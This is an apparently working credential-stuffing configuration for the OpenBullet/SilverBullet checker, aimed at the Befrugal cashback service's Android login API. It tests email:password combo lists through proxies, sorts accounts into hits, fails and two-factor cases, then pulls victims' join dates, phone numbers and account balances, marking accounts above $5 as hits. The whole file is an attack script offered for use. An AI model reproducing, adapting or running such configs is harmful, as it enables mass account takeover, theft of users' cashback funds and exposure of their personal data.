[SETTINGS]
{
  "Name": "Befrugal",
  "SuggestedBots": 150,
  "MaxCPM": 0,
  "LastModified": "2021-09-28T01:05:38.43132+04:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "simple",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "MailPass",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "Befrugal Android API",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
REQUEST POST "https://tbwsjs.befrugal.com/wssimple.asmx/LoginUser2" 
  CONTENT "UserToken=&toolbarversion=android-phone-2021.3.2.113&userName=<USER>&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: tbwsjs.befrugal.com" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "Content-Type: application/x-www-form-urlencoded" 
  HEADER "User-Agent: Dalvik/2.1.0 (Linux; U; Android 7.1.2; ASUS_Z01QD Build/N2G48H)" 
  HEADER "Connection: Keep-Alive" 
  HEADER "Content-Length: 247" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "<Success>false</Success>" 
  KEYCHAIN Success OR 
    KEY "<Success>true</Success>" 
  KEYCHAIN Custom "2FACTOR" OR 
    KEY "<Requires2FA>true</Requires2FA>" 

REQUEST POST "https://tbwsjs.befrugal.com/wssimple.asmx/GetAccountInfo" 
  CONTENT "UserToken=&toolbarversion=android-phone-2021.3.2.113" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Dalvik/2.1.0 (Linux; U; Android 7.1.2; ASUS_Z01QD Build/N2G48H)" 
  HEADER "Connection: Keep-Alive" 
  HEADER "Accept-Encoding: gzip, deflate" 

PARSE "<SOURCE>" JSON "UserToken" -> VAR "TOKEN" 

PARSE "<SOURCE>" LR "\"JoinDate\":\"" "T" CreateEmpty=FALSE -> CAP "Date Registered" 

PARSE "<SOURCE>" JSON "MobileNumber" CreateEmpty=FALSE -> CAP "MobileNumber" 

PARSE "<SOURCE>" JSON "TotalBalance" CreateEmpty=FALSE -> CAP "Total Balance" "$" "" 

PARSE "<SOURCE>" JSON "BonusBalance" CreateEmpty=FALSE -> CAP "Bonus Balance" "$" "" 

PARSE "<SOURCE>" JSON "PendingBalance" CreateEmpty=FALSE -> CAP "Pending Balance" "$" ""  

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "<Total Balance>" LessThan "$5" 
  KEYCHAIN Success OR 
    KEY "<Total Balance>" GreaterThan "$5" 

